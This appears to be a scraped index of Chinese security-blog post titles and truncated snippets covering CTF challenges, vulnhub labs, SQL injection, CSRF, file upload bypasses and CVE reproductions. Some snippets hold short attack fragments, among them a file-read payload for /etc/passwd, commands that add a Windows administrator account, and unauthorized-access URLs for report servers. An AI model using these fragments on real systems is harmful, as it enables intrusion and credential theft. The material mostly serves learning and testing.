XCTF 攻防世界 Reverse新手题（getit） 首先，判断文件有没有加壳，是多少位的，利用exeinfoPE可以得知，程序并没有加壳，并且是64位的elf程序直接用IDA64打开，找到main函数，…

XCTF 攻防世界 Reverse新手题（open-source）

XCTF 攻防世界 Reverse新手题（open-source） 这道题主要是分析代码，因为源代码已经直接给出了： #include <stdio.h> #include <string.h>int main(int argc, char *argv[]) {if (argc ! 4) {printf("what?\n&q…

XCTF 攻防世界 Reverse新手题（game)

XCTF 攻防世界 Reverse新手题（game) 这道题目按照一般IDA静态分析的思路走，应该不难做出来首先，找到main函数，F5反编译一下发现main_0()函数，进入此函数，反编译一下对main_0()的代码进行分析&#xff0…

十四、Kali Linux 2 无线安全渗透测试

一、如何对路由器进行渗透测试 Routerpwn网站漏洞渗透模块漏洞渗透模块以一个表得形式显示，一共5列： 第1列是漏洞渗透模块的发布时间（Date） 第2列是漏洞渗透模块的种类（Category） 第3列是漏洞渗透模块的…

渗透测试和CTF中SQL注入攻击

渗透测试和CTF中SQL注入攻击本文内容主要基于MySQL的注入首先，SQL注入的成因：开发人员在开发过程中，直接将URL中的参数，HTTP Body中的POST参数或其它外来的用户输入（如Cookies、User-Agent等）与SQL语句…

Kali Linux安装中国蚁剑（AntSword）

Kali Linux安装中国蚁剑（AntSword） 下载地址：https://github.com/AntSwordProject/下载Linux64位的AntSword-Loader进入解压目录后，给执行权限：chmod ux AntSword进行安装前要创建空目录，最好是/usr/local…

IPv4地址范围以及子网范围计算+子网掩码表

IPv4地址范围以及子网范围计算 1. 分类IP范围 ClassRangeA0.0.0.0 - 10.255.255.255B128.0.0.0 - 191.255.255.255C192.0.0.0 - 223.255.255.255D224.0.0.0 - 239.255.255.255E240.0.0.0 - 255.255.255.255 2. 保留IP范围 10.0.0.0 - 10.255.255.255 127.0.0.0 - 127.255.25…

十三、Kali Linux 2 身份认证攻击

身份认证攻击网络的发展正在逐步的改变我们的生活和工作方式。我们现在越来越依赖网络上各种应用，例如当我们之间在进行通信的时候，通常的方式都会是QQ，微信或者电子邮箱；而当我们进行购物的时候，支付宝，…

三、Kali Linux 2 被动扫描

看起来世界上好像没有任何监狱可以关的住雷布雷斯林，可是他又是怎么完成这些任务的呢？ 1、必须熟悉整个监狱的布局 2、必须摸清看守和犯人日常规律 3、不能孤军奋战，必须得到里应或者外合被动扫描、主动扫描：对一个目…

二、Kali Linux 2 使用基础

一、Kali Linux 2 介绍与安装 1、Kali Linux 2 简介 Kali Linux 2是一个面向专业人士的渗透测试和安全审计的操作系统，它是由之前大名鼎鼎的Back Track系统发展而来。Back Track系统曾经是世界上非常优秀的渗透测试操作系统，取得了极大的成功。之后Off…

一、网络安全渗透测试的相关理论和工具

一、网络安全渗透测试是什么呢？ 在美国著名电影《金蝉脱壳》中，雷布雷斯林是这个世界上最强的越狱高手之一，他在过去8年的时间内成功地从14所守卫高度森严的重型监狱中逃脱。即便如此，雷布雷斯林却并不是一个罪犯，他真…

解决vulnhub靶机无法获取IP问题

解决vulnhub靶机无法获取IP问题问题产生今天在vulnhub下载了一台靶机，将网段调整为了NAT模式，但是发现在kali使用arp-scan进行扫描时怎么也获取不到靶机IP 解决方案关闭靶机，然后再启动靶机，启动时按shift进入如下页面 …

vulnhub靶场，DC-5

vulnhub靶场，DC-5 环境准备靶机下载地址：https://www.vulnhub.com/entry/dc-5,314/ 攻击机：kali（192.168.58.130） 靶机：DC-5（192.168.58.148） 下载好靶机之后直接使用VMware Work…

Kali Linux渗透测试——入侵Windows10

在进行入侵检测之前，配置好网络环境，使其相互连通，才能进行入侵。在使用Metasploit成功入侵之后拿到的只是一个基础的shell，要想拿到系统级别的shell，添加系统用户，获取用户登录口令，还需要进一…

vlunhub之Nagini（详细过程）

写在前面： 首先这篇文章是老师上课讲的一个靶场，然后就是复现一下。来来回回也折腾了两三天，也认识到自己真的太弱了，中间可能会有一些不太连贯甚至是突兀的地方，能力所限只能写到这个程度。也是参考了两位大神写好的…

vlunhub之tomato

目录信息搜集扫描网段确定主机IP地址扫描该IP地址开放端口以及服务发现漏洞利用IP地址登录尝试扫描出的端口爆破网站目录发现敏感文件泄露利用漏洞尝试getsell 利用php反弹shell 权限提升在该目录下开启http服务在getshell里下载该文件信息搜…

sqli-libs 1-5

目录第一关 sqlmap 判断是否有注入点获取数据库名获取数据库中的表名获取表中的列名获取列中的字段手工注入找到注入点查询有几个字段查询数据库名查询表名查询列名查询值分析源码第二关源码分析第三关首先还是判断注入点源码分析第四关…

DOS攻击

DOS攻击 0x01、什么是DOS攻击 DOS攻击不是DOS DOS攻击是利用程序漏洞一对一的执行资源耗尽的Denial of Service拒绝服务攻击 DenialOfServie ! DiskOperationSystem DDoS分布式拒绝服务 DOS攻击拼的是各自的资源，效果比较差而DDOS则是汇聚资源能力&#xff0…

CSRF学习

1、什么是csrf CSRF（Cross Site Request Forgery），中文名称：跨站请求伪造，缩写为CSRF攻击者盗用了你的身份，以你的名义发送恶意请求CSRF是跨站请求伪造，不攻击网站服务器，而是冒充用…

文件包含与文件内容检测绕过

文章目录文件包含与文件内容检测绕过文件包含与文件内容检测绕过一个购物网站，首先是注册账号找上传点在用户信息处发现可以留言，此处可以进行xss，但是很多网站都开了防护，导致xss行不通。同位置还有文件上传点直接上传jpg等允…

SQLserver提权

SQLserver提权利用xp_cmdshell，在默认情况下xp_cmdshell禁用，是sa权限时不一定要拿到webshell利用还是先看配置文件（一般配置文件都是与config相关） 查看当前网站权限可以看到，权限很低当打了很多补丁时&#xf…

编辑器漏洞 EWebedtitor FCKeditor spaw editor

编辑器漏洞简介一般编辑器会嵌入在网站当中，由后台或者前台调用，进行内容的编辑、文件上传。通常，网站的脚本语言和编辑器的脚本语言是相同的，即ASP的站点，其编辑器的脚本语言也是ASP；PHP、JSP、.NET…

MG信息泄露

敏感信息泄露漏洞描述由于管理员或者技术人员等各种原因导致敏感信息泄露。许多web应用程序和api都无法正确保护敏感数据，攻击者可以通过窃取或修改未改加密的数据来实施信用卡诈骗、身份盗窃或其他犯罪行为。未加密的敏感数据容易受到破坏，因此&…

小白怎么入门网络安全？啃完这篇就够啦！

由于我之前写了不少网络安全技术相关的故事文章，不少读者朋友知道我是从事网络安全相关的工作，于是经常有人在微信里问我： 我刚入门网络安全，该怎么学？要学哪些东西？有哪些方向？怎么选&#xff…

ToBeWritten之物联网MQTT、Z-Wave等协议

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

任意文件上传

任意文件上传概述大多数网站都有文件上传的接口，但如果在后台开发时没有对上传的文件进行安全考虑或者采用了有缺陷的措施，导致攻击者可以通过一些手段绕过安全措施从而上传一些恶意文件，从而通过对恶意文件的访问来控制整个后台分类及…

ToBeWritten之局域互联网协议

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

dvwa csrf通关之旅

csrf通关之旅前言lowMedium前言准备环境 dvwa phpstudy bur 客户机 low 首先我们尝试修改一次名字我们发现是用get方式提交的然后我们换一个浏览器我们刚刚把密码修改成123456现在我想修改成54321 ?password_new123456&password_conf123456&ChangeChange#?pa…

安全工程师必读 ——《安全技术工具扫盲》

安全技术 SAST - 静态应用安全测试（白盒检测）DAST - 动态应用安全测试（黑盒检测）IAST - 交互式应用安全测试（灰盒检测）RASP - 运行时应用自我保护Dependency Scanning（依赖项安全扫描&#xff…

渗透攻防需要实践资料统计

书籍 1、Metasploit 渗透测试指南 2、网络攻防技术与实践 3、0day 安全:软件漏洞分析技术(第2版) 4、Wireshark数据包分析实战(第2版) 5、IDAPro权威指南 6、网络扫描技术揭秘:原理、实践与扫描器的实现 7、Nmap Network ScanningNmap Network Scanning Edition 2 8、Googl…

XSS - 跨站脚本攻击

一、XSS简介。 XSS跨站脚本（Cross-Site Scripting，XSS）自1996年诞生以来，如今已经历十多年的演化。由于和另一种网页技术-层叠样式表（Cascading Style Sheets，CSS）的缩写一样，为了防…

Fidller入门体验和基本使用

1. 首先从官网上下载fidller , 目前已经到4的版本了, 注意的是4这个版本安装需要网络 , 不支持本地安全,如果没网环境下安装, 请在网上下载2.x的版本。官网地址:https://www.telerik.com/fiddler 2.x版本:https://pc.qq.com/detail/2/detail_4502.html 注:Fidller安装需要.NE…

《入侵的艺术》读书心得：第六章：渗透测试中的智慧与愚昧

第六章：渗透测试中的智慧与愚昧这些想法是愚昧的 1.任何期待渗透测试结果是“毫无破绽”、“无懈可击”…都是极其愚昧的： 第一层含义：测试的不可穷尽性原理（同软件测试） 第二层含义：作为优秀甚至只是合…

白帽黑客最常用的十款工具，你知道几款？

1 Nmap nmap是一个网络连接端扫描软件，用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端，并且推断计算机运行哪个操作系统（这是亦称 fingerprinting）。它是网络管理员必用的软件之一，以及用以评估网络…

黑客常用工具合集

首先恭喜你发现了宝藏。本文章集成了全网优秀的开源攻防武器项目，包含： 信息收集工具（自动化利用工具、资产发现工具、目录扫描工具、子域名收集工具、指纹识别工具、端口扫描工具、各种插件....etc...）漏洞利用工具&#xff0…

都2023年了，还有人在盲目自学黑客？

背景经常逛CSDN和知乎，不理解的是，都2023年了，相关资源都这么多了，还有人不知道怎么学习网络安全。本人从事网络安全工作5年，在几个大厂都工作过，安全服务、渗透测试工程师、售前、主机防御等职位都做过…

耗时 48小时整理了网络安全学习路线，非常详细！

前言上次发的文章【都2023年了，还在问网络安全怎么入门】很多小伙伴在评论区回复不知道怎么学习，我也反思了一下，确实没写到学习方法和路线，所以这一期就出一一个怎么学习网络安全的学习路线和方法，觉得有用的话三连…

【提权概述】

提权概述常用命令 whoami 查看当前用户名，用于查看权限大小 ipconfig 显示当前tcp/ip配置。用于查看ip net user 查看当前系统的所有用户 net user 账号密码 /add 创建用户 net loaclgroup administrators 账号 /add 将用户加入管理员组 tasklis…

Apache Druid远程命令执行漏洞复现(CVE-2021-25646)

漏洞概述 Apache Druid 是一个分布式的数据处理系统。Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。在Druid 0.20.0及更低版本中，用户发送恶意请求，利用Apache Druid漏洞可以执行任意代码。攻击者可直接构造恶意请求执行…

黑客工具软件大全

黑客工具软件大全100套给大家准备了全套网络安全梓料，有web安全，还有渗透测试等等内容，还包含电子书、面试题、pdf文档、视频以及相关的网络安全笔记 👇👇👇 《黑客&网络安全入门&进阶学习包》 &a…

全网最详细网络安全学习路线！手都给我码酸了！

零基础小白，学完掌握可就业！入门到入土的网安学习路线！ 在各大平台搜的网安学习路线都太粗略了。。。。看不下去了！ 我把自己报班的系统学习路线，整理拿出来跟大家分享了！ 本文为纯干货纯文字内容&#x…

常见的未授权漏洞批量检测工具

常见的未授权漏洞检测命令行版已放出支持多线程，批量扫描，指定服务扫描，命令行版地址https://github.com/xk11z/unauthorized_com GUI版unauthorizedV2已更新，可批量ip检测导出结果项目包含 1 、FTP 未授权访问&#xff08…

绕安全狗文件上传，绕waf进行文件上传

此方法适用于国内waf，具体payload可能不同，但思路是相同的绕安全狗文件上传靶场：upload-labs Pass6安全狗查看源码得知没有过滤大小写，直接改后缀大小写绕过绕过方式抓包后 filename处多写几个等于号，删除一…

文件上传之后台写入拿shell

文章目录后台写入拿shell1、进入后台先看各种模块功能2、发布文章3、木马扫描后台写入拿shell 靶场：phpcms 1、进入后台先看各种模块功能如果是Nginx服务器可以上传头像点直接getshell，Apache一般都是白名单限制，直接放弃有些网站配置中可…

ToBeWritten之车载信息娱乐系统 (IVI)

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

SQL注入—Access注入，Access偏移注入

Access注入，Access偏移注入 Access数据库组成表名列名数据某accessasp注入靶场 iisaspaccess asp一般搭配access PHP一般搭配mysql aspx一般搭配msSQL注入的条件是能够传参、与数据库互动，数据交互 get，post，cookie都可以注入…

掩日免杀笔记

微信公众号：乌鸦安全扫取二维码获取更多信息！ 1. 环境攻击机： kali linux 10.211.55.23 受害机： Windows10 360主动防御 Windows7 火绒主动防御 2. 生成exe文件在kali linux下使用msfvenom生成一个64位的exe文件 msfvenom…

关于渗透的一些概念名词

目录脚本语言常见的脚本语言类型不同脚本类型与安全漏洞的关系漏洞挖掘代码审计与脚本类型的关系后门什么是后门，有哪些后门后门在安全测试中的实际意义关于后门需要了解哪些 WEB WEB的组成架构模型架构漏洞安全测试简要介绍为什么从WEB层面为…

渗透测试信息收集概要

文章目录信息收集概要Whois查询指纹CMS网站IP旁站、C段服务器服务器操作系统版本、容器版本、数据库类型邮箱收集端口服务（80、443等）敏感文件搜索目录遍历说明.txt目录遍历说明.txt信息收集概要 Whois查询联系人信息邮箱反查域名指纹CMS 人工、工…

渗透测试信息收集——CDN绕过

文章目录绕CDN查找真实IP1、如何判断目标存在 CDN 服务？2、网站真实IP2.1、不同IP访问查询2.2、利用子域名请求获取真实IP2.3、第三方网站查验2.4、利用国外地址请求获取真实IP2.5、利用邮件服务器接口获取真实IP2.6、敏感文件2.7、利用黑暗引擎获取真实IP2.8、dns…

渗透测试工程是的主要工作

一、常见问题 1、甲方客户系统，之前做过渗透测试，我们要怎么做？ 深入了解客户系统，进而挖掘深层次漏洞。 2、甲方客户系统，部署WAF，我们要怎么做？ 首先绕过防火墙进行测试，比如通过…

完成一次渗透测试项目 New Address

背景：小B接到一个渗透测试任务，由于很久没有从乙方视角执行渗透测试的他决定先梳理一下自己的思路。准备工作第一个是渗透测试用例：对于技术人员来讲这是一个比较好的知识点沉淀的方式，不但有助于你在每一次的渗透测试中不遗漏…

2023年最新整理网络安全护网蓝队面试题

如何打击黑灰产工具全面监控和快速响应（溯源）：对黑灰进行长期跟进，了解黑灰产工具的传播链条和路径，第一时间捕获活跃的黑灰产工具（建立特征词监控，数据取样、交叉分析） 建立软件指…

[ vulhub漏洞复现篇 ] Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906

🍬 博主介绍 👨‍🎓 博主介绍：大家好，我是 _PowerShell ，很高兴认识大家~ ✨主攻领域：【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】 🎉点赞➕评论➕收藏 == 养成习惯（一键三连）😋 🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末…

LDAP 注入与防御

0x00：介绍 LDAP 全英文：Lightweight Directory Access Protocol，翻译过来就是轻量级的目录访问协议。其实就是访问目录，浏览目录。有很多企业存储一些数据信息，例如部门信息，部门里成员的信息，…

SSRF 漏洞记录

0x00：漏洞原理 SSRF（Server-Side Request Forgery）也属于应用层上的一个漏洞类型，用一个最简单的例子来理解这个漏洞：比如一个添加图文的功能，填入标题内容和封面图然后提交在网站前台显示，对于…

登录可能存在哪些问题

登录可能存在哪些问题： 01：登录没有做次数限制，可被暴力破解。 02：登录不安全的提示，可猜测用户名和密码是否合法。 03：登录验证码失效，可被暴力破解。 04：登录验证码过于清晰&…

信息搜集 - GoogleHack

0x00：简介在渗透测试的信息搜集阶段，利用搜索引擎去搜索一些信息也是必不可少的，除了上一篇记录的 shodan 外，googlehack 也是很多人使用的一种方法，利用 google 搜索信息进行信息搜集的工作。 0x01：基本…

Netcat详解

0x00：介绍 netcat 简称 nc，安全界叫它瑞士军刀。ncat 也会顺便介绍，弥补了 nc 的不足，被叫做 21 世纪的瑞士军刀。nc 的基本功能如下： telnet / 获取系统 banner 信息传输文本信息传输文件和目录加密传输文件端口扫描…

kali 安装 netspeed 扩展

netspeed 扩展可以在桌面顶部那栏实时的显示流量，和手机实时显示网速一样，这个扩展还是很不错的。首先，kali 需要可以访问 google，否则无法下载这个扩展（可以参考之前的 kali 配置 ssh 文章）。命令行使…

关于明文传输的问题

引子： 上周拿到一个线上复测的项目，中间有一个明文传输问题，这个问题平时基本不记，客户那测试基本都是内网环境，上线基本都是 https。这个问题之前是这样测试的：抓包，如果内容是明文就记这个问…

PHP 代码审计之添加管理员

0x00：前言 cms 注册用户时，存在添加管理员漏洞，记录如下。 0x01：代码追踪首先，前台注册普通账号时，url 地址为 / user/regin.php，打开 regin.php 发现，刚开始是接收注册数据&…

BUUCTF Reverse(reverse2, 内涵的软件, 新年快乐)

BUUCTF Reverse(reverse2, 内涵的软件, 新年快乐) reverse2 这道题本质上其实和reverse1一样，也是字符的替换，将文件用IDA打开后，也是可以直接看到flag信息的，但是同样的，那也不是最终的flag，分析可得是将…

XCTF 攻防世界 Reverse 新手题(re1)

XCTF 攻防世界 Reverse 新手题(re1) re1 首先，可以看到附件是一个exe程序，可以先执行一下看看（一般CTF的题目是不会有什么病毒的，如果有杀毒软件显示有木马的话，允许执行就可以了，因为目前大部分exe文件的…

乌班图安装msf

网上文章都是去官网下载，官网下载太慢了这里使用deb包进行安装。选择这个。下载完成以后拖到vps 成了这样快多了。

DVWA靶机通关系列--1.Brute Force（暴力破解）（解题思路+审计分析）

DVWA靶机通关系列--1.Brute Force（暴力破解）（解题思路审计分析）前言0x01 Brute Force（暴力破解）CLASS:LOWCLASS:MEDIUMCLASS:HIGHCLASS：IMPOSSIBLE前言最近在复习一些基础的常见web漏洞&#x…

渗透测试之信息搜集——google hacking

一、google hacking收集目标信息的内容：学习目标： 1.了解google hacking 的原理 2.掌握google hacking 语法 3.熟练使用google hacking 进行信息收集学习任务： 1.动手使用google hacking 进行目标信息收集一、google hacking收集目标信息的…

渗透测试靶机：DC-4

开始 : ) 环境准备靶机下载：http://www.five86.com 虚拟机：Virtual Box Kali 开始看一下DC-4的介绍。为初、中级选手准备，只有一个Flag，从技术上讲，有多个入口，没有线索。Go 靶机IP发现 nmap 尝…

vulnhub之Cherry（超级详细）

写在前面在csdn上写文章大概也写了二十篇左右了，其实就文章本身还是有些问题，首先还是自己没有什么文笔，本来就是一些技术类的东西比较生硬，只能尽自己可能写的有趣一些，但主要还是要表达清楚自己的意思。也算锻炼自…

pikachu-----暴力破解

目录什么是暴力破解暴力破解漏洞测试流程 pikachu-----基于表单的暴力破解尝试登录，并抓取数据包发送的Inturder模块，进行暴力破解暴力破解的绕过和防范（验证码&Token） 验证码的认证流程 pakachu--验证码绕过&…

命令执行与反序列化

命令执行与反序列化原理设计者在编写代码时没有做严格的安全控制，导致攻击者通过接口或相关参数提交“意想不到”的命令，从而让后台进行执行，从而控制整个后台服务器。 &、|、“ 空格”等组合连接实现只要带参数的地方都可能出现…

CSRF伪造请求攻击

CSRF伪造请求攻击简介在CSRF的攻击场景中攻击者会伪造一个请求（这个请求一般是一个链接），然后欺骗目标用户进行点击，用户一旦点击了这个请求，整个攻击就完成了。所以CSRF攻击也称为"one click"攻击。 C…

wireshark抓ssh，telnet，dns等教程

wireshark使用教程实验环境三次握手四次挥手DNS/UDPSSHTelnetftp实验环境 WIN10wireshark 三次握手随便打开一个网站打开wireshark抓包就行条件为 ip.dst 网址对应的ip地址四次挥手因为最后一次握手和倒数第二次握手整合信息一起发送了所以抓不到 DNS/UDP 使用nslooku…

CTF封神台第三关通关

分析代码 ①　从请求头中拿到Referer，并赋值给ComeUrl。 ②　判断ComeUrl是否为空，若是空，则表明是直接输入地址访问。本题不允许 ③　ComeUrl不为空， 读取Host，并在前面拼接 http:// 赋值给cUrl，如果ComeU…

使用Hydra和Burp Suite破解在线Web表单密码

步骤1: 打开THC-Hydra 那么，让我们开始吧。启动Kali并打开应用程序中的THC-Hydra - > Kali Linux - >密码攻击 - >在线攻击 - > hydra。步骤2: 获取Web表单参数为了能够破解Web表单用户名和密码，我们需要确定Web表单登录页面的参数以及…

渗透测试-SQL注入原理

文章目录 sql注入原理sql注入基本流程判断是否存在注入，是否会将用户输入拼接到sql语句，并当做代码执行判断字段数判断显错位判断库名判断表名判断列名判断具体数据 sql注入原理 sql注入基本流程判断是否存在注入，是否会将用户输入拼接到sql…

蓝凌OA custom.jsp 任意文件读取

曾子曰：“慎终追远，民德归厚矣。” 漏洞复现访问漏洞url： 出现漏洞的文件为 custom.jsp，构造payload： /sys/ui/extend/varkind/custom.jsp var{"body":{"file":"file:///etc/passwd&q…

网络安全（黑客）学习路线

前言： 学基础花费很长时间，光语言都有几门，有些人会倒在学习 linux 系统及命令的路上，更多的人会倒在学习语言上； 1、打基础时间太长对于网络安全基础内容，很多人不清楚需要学到什么程度，囫…

DVWA环境搭建

DVWA环境搭建 1.先搭建php环境先去官网下载phpStudy安装包，下载完成后可进行安装。安装步骤如下： 双击exe文件，点击立即安装. 点击安装完成，即完成安装。完成安装后，会自动启动程序。程序启动后，在首页…

漏洞复现|Kyan密码泄露/命令执行漏洞

0x01阅读须知所有发布的技术文章仅供参考，未经授权请勿利用文章中的技术内容对任何计算机系统进行入侵操作，否则对他人或单位而造成的直接或间接后果和损失，均由使用者本人负责。郑重声明：本文所提供的工具与思路仅用于学习与…

浅谈搭建CobaltStrike云服务器可能会遇到的一些问题

1.文件上传若要将本机的文件上传至云服务器，你需通过Xshell来实现先在xshell连接云服务器，命令行中执行rz命令，即可实现文件上传若没有rz命令,则需用到以下命令进行安装(二选一): 适用于redhat linux: yum install lrzsz适用于centos或u…

看完这篇教你玩转渗透测试靶机——Metasploitable2

Metasploitable2渗透测试详解Metasploitable2靶机介绍：Metasploitable2靶机下载：Metasploitable2靶机安装：Metasploitable2靶机漏洞详解：Metasploitable2靶机渗透总结：Metasploitable2靶机介绍： Metasploi…

burpsuite中intruder模块爆破的四种模式

1.sniper:狙击手，表示如果爆破点设置一个，simplelist如果是6个，就执行6次，如果爆破点设置两个，则执行12次，一般这个模式下只设置一个爆破点，因为如果用户名和密码都不知道的情况下不会使用该模式…

MS17-010 永恒之蓝漏洞利用

MS17-010 永恒之蓝漏洞利用漏洞概述: 永恒之蓝漏洞是利用框架中一个针对SMB服务(445端口，主要用于连接unix系列系统和windows)进行攻击的漏洞，该漏洞导致攻击者在目标系统上可以执行任意代码。漏洞原理： MS17-010漏洞出现在的原因是Srv…

Tomcat PUT方法任意写文件漏洞（CVE-2017-12615）

Tomcat PUT方法任意写文件漏洞（CVE-2017-12615） 漏洞概述: 如果Tomcat开启了PUT方法(默认关闭，有点鸡肋，但是有些页面需要PUT，无法关闭)，则有可能存在远程命令执行漏洞，攻击者可以利用PUT方法…

zabbix SQL注入漏洞（CVE-2016-10134）

zabbix SQL注入漏洞（CVE-2016-10134） 漏洞概述: zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。Zabbix 的latest.php中的toggle_ids[]或jsrpc.php种的profieldx2参数存在sql注入，通过sql注入获取管…

Spring Boot Actuator未授权访问远程代码执行_eureka_XStream反序列化

文章目录漏洞复现扫描探测RCE(1)编写利用脚本(2)设置 eureka.client.serviceUrl.defaultZone 属性(3)触发(4)恢复 eureka.client.serviceUrl.defaultZone漏洞复现扫描探测使用的工具为:SB-Actuator 使用工具扫描发现目标地址存在Spring Boot Actuator未授权访问&#xff0c…

SICKOS: 1.2

#1寻找目标 nmap -sS -O 192.168.1.0/24 确定ip 192.168.1.124 #2扫描端口 nmap -sS -O -sV 192.168.1.124 发现开放80端口，从web入手。 #3寻找入口查看源代码，没东⻄。扫描一下目录访问瞅瞅,注意到lighttpd/1.4.28 找找有没有能利用的&#xf…

Kibana远程代码执行漏洞(CVE-2019-7609)

Kibana远程代码执行漏洞(CVE-2019-7609) 漏洞简介 2019年2月官方发布公告称Kibana存在远程代码执行漏洞，5.6.15 和 6.6.1之前的 Kibana 版本在 Timelion 可视化工具中存在功能缺陷，导致攻击者可在服务器上利用Kibana执行任意代码。Kibana 是 Elasticse…

海康威视iVMS综合安防系统任意文件上传(0Day)

漏洞描述攻击者通过请求/svm/api/external/report接口任意上传文件，导致获取服务器webshell权限，同时可远程进行恶意代码执行。免责声明技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和…

如何自学（黑客）网络安全

前言： 想自学网络安全（黑客技术）首先你得了解什么是网络安全！什么是黑客！ 网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“…

ToBeWritten之记录狩猎过程

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

ToBeWritten之车联网安全中常见的TOP 10漏洞

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

2023年国家护网0day-poc/exp漏洞全汇总(目前已更新到91个..实时更新中...)

文章目录前言0x01 Sxf-报表系统：版本有限制0x02 E-Cology 某版本 SQL注入漏洞：0x03 某恒明御运维审计与风险控制系统xmlrpc.sock任意用户添加漏洞0x04 泛微 E-Cology 某版本 SQL注入漏洞 POC：0x05 金和OA C6-GetSqlData.aspx RCE命令执行漏洞：(已确认)0x06 大华智慧园区综…

一款新的webshell管理工具

Alien 项目简介语言 C# .NET Framework V4.8 功能 File Manager （可显示图片， 可SearchFile） 虚拟终端数据库注册表监控截图系统信息项目描述一句话木马一句话木马是在渗透测试中用来控制服务器的工具强大之处在于木…

网络安全（黑客）入门

想自学网络安全（黑客技术）首先你得了解什么是网络安全！什么是黑客！ 网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全…

渗透测试怎么入门？（超详细解读）

1. 什么是渗透测试渗透测试就是模拟真实黑客的攻击手法对目标网站或主机进行全面的安全评估，与黑客攻击不一样的是，渗透测试的目的是尽可能多地发现安全漏洞，而真实黑客攻击只要发现一处入侵点即可以进入目标系统。一名优秀的渗透测试工程…

子域名扫描, 后台扫描

子域名和后台扫描一, 子域名扫描在渗透测试的早期阶段，子域名扫描是一个非常重要的步骤，它有助于识别目标组织的网络结构和在线资源。子域名扫描应该在获得适当的权限和授权的情况下进行，以确保所有活动都是合法和合规的。 1. 原因与目…

smartbi token回调获取登录凭证漏洞

前段时间，Smartbi官方修复了一处权限绕过漏洞。未经授权的攻击者可利用该漏洞，获取管理员token，完全接管管理员权限。于是研究了下相关补丁并进行分析。 0x01分析结果依据补丁分析，得到如下漏洞复现步骤第一步，设…

帆软报表系统查看数据库密码

有子曰：“礼之用，和为贵。先王之道，斯为美。小大由之。有所不行，知和而和，不以礼节之，亦不可行也。” 查看数据库密码构造payload，访问漏洞url： /ReportServer?opfr_server&…

对验证码的识别爆破

声明：该系列文章首发于公众号：Y1X1n安全，转载请注明出处！本公众号所分享内容仅用于每一个爱好者之间的技术讨论及教育目的，所有渗透及工具的使用都需获取授权，禁止用于违法途径，否则需自行承担&…

帆软报表系统未授权重置授权

子曰：“父在观其志，父没观其行。三年无改于父之道，可谓孝矣。” 未授权重置授权构造payload，访问漏洞url： /ReportServer?opfr_server&cmdsc_version_info&showtoolbarfalse漏洞证明： 文笔生…

sql 注入(1), union 联合注入

sql 注入, union 联合注入一, 参数分类根据可控参数的类型不同, 对注入类型分类: 1. 数字型select * from table where id1 2. 字符型select * from table where usernameroot 3. 搜索型select * from table where id like %root% 4. 关于注释:注入时, 在查询参数中使用注…

sql 注入(4), 盲注

sql 注入, 盲注盲注适合在页面没有任何回显时使用. 测试页面有变化, 但是没有显示任何异常错误等信息. 情景: url: http://192.168.112.200/security/read.php?id1 服务器数据库名: learn一, boolean盲注 # 盲注可能需要一个一个字符去试探, 字符串处理函数经常会用到. 比…

Pikachu靶场——目录遍历漏洞和敏感信息泄露

文章目录 1. 目录遍历漏洞1.1 源码分析1.2 漏洞防御 2. 敏感信息泄露2.1 漏洞防御 1. 目录遍历漏洞漏洞描述目录遍历漏洞发生在应用程序未能正确限制用户输入的情况下。攻击者可以利用这个漏洞，通过在请求中使用特殊的文件路径字符（如 …/ 或 %2e%2e…

泛洪攻击（Flood Attack）

执行网络攻击，包括 Ping 泛洪攻击，在绝大多数国家/地区都是非法的，它违反了计算机犯罪法律和条例。执行或尝试执行这样的攻击通常会导致法律后果，包括罚款和监禁。因此，这些信息仅供理论学习和了解，绝不应用…

帆软报表系统获取管理员权限

子曰：“君子食无求饱，居无求安，敏于事而慎于言，就有道而正焉：可谓好学也已。” 漏洞实战构造payload，访问漏洞url后台地址： /ReportServer?opfr_auth&cmdah_loginui&_161983254558…

ToBeWritten之让响应团队参与并做好沟通

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

启莱OA CloseMsg.aspx SQL注入

子贡曰：“贫而无谄，富而无骄，何如？”子曰：“可也。未若贫而乐，富而好礼者也。” 子贡曰：“《诗》云：‘如切如磋，如琢如磨。’其斯之谓与？”子曰：“…

ToBeWritten之VSOC安全运营

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

CVE-2017-12615 Tomcat远程命令执行漏洞

漏洞简介 2017年9月19日，Apache Tomcat官方确认并修复了两个高危漏洞，漏洞CVE编号：CVE-2017-12615和CVE-2017-12616，其中远程代码执行漏洞（CVE-2017-12615） 当 Tomcat 运行在 Windows 主机上，…

ToBeWritten之针对 Car ATTCK 的攻防矩阵

